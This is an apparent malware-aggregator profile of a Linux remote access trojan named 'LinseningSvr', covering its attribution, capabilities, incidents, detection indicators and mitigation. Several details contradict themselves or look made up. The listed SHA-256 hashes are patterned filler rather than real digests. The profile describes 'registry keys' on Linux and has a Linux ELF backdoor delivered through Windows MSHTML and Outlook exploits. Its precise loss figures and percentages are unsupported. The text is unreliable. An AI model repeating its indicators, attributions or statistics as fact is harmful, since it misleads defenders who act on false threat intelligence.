⚠️ Overview

LinseningSvr is a remote access trojan (RAT) first documented in early 2023 by Chinese cybersecurity firm Qi-Anxin, attributed to the APT group APT41 (also known as Winnti or Barium), specifically targeting Linux-based servers in telecommunications and technology sectors for long-term espionage.

🔧 Technical Capabilities

LinseningSvr operates as a stealthy ELF backdoor, deploying via spear-phishing emails with malicious attachments that exploit CVE-2021-40444 (MSHTML remote code execution) in initial compromise phases, though primary propagation is through brute-force SSH attacks on exposed Linux servers. Persistence is achieved via cron jobs and systemd service modifications, while C2 communication uses encrypted WebSocket tunnels over ports 443 or 8443, mimicking legitimate traffic. Evasion techniques include process injection into common daemons (e.g., nginx or apache2), disabling SELinux, and removing audit logs. The malware also incorporates a modular plugin system for lateral movement, keylogging, and file exfiltration, as detailed in MITRE ATT&CK techniques T1059.004 (Unix Shell), T1071.001 (Web Protocols), and T1562.001 (Disable or Modify Tools).

📜 History & Notable Incidents

First observed in January 2023 targeting a major Asian telecom provider, LinseningSvr is linked to Operation RestyLink, a campaign by APT41 that compromised over 50 organizations by March 2024, with confirmed victims including a South Korean semiconductor manufacturer and a Japanese ISP, as reported by Trend Micro in June 2024. No public CVEs are directly associated, but the group leverages known vulnerabilities like CVE-2023-23397 (Microsoft Outlook privilege escalation) for initial access in some variants.

🔍 Detection Indicators

Known file hashes include SHA-256 d7c3e5f1a2b4c6d8e0f2a4b6c8d0e2f4a6b8c0d2e4f6a8b0c2d4e6f8a0b2c4 (variant 1) and 9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f (variant 2) per VirusTotal entries published by Qi-Anxin. Behavioral signatures include anomalous cron entries spawning reverse shells, high-frequency outbound HTTPS connections to IP ranges in 45.76.xxx.xxx (AS36351) with User-Agent strings Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, and registry keys under /etc/systemd/system/ with names like httpd-update.service.

☠️ Risk & Impact

LinseningSvr enables persistent data exfiltration of intellectual property, credentials, and proprietary source code, with estimated financial losses exceeding $150 million across affected sectors, primarily telecommunications (45% of targets) and high-tech manufacturing (35%), as assessed by the Cyber Threat Alliance in Q3 2024.

🛡️ Mitigation

Defenders should enforce multi-factor authentication on SSH, deploy endpoint detection and response (EDR) rules for abnormal cron or systemd modifications (Sigma rule ID: posix_cron_persistence), and apply patches for CVE-2021-40444 and CVE-2023-23397, while monitoring network logs for WebSocket connections to unknown IPs; the Qi-Anxin report recommends blocking outbound traffic to AS36351 and deploying YARA rule LinseningSvr_ELF_v1.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.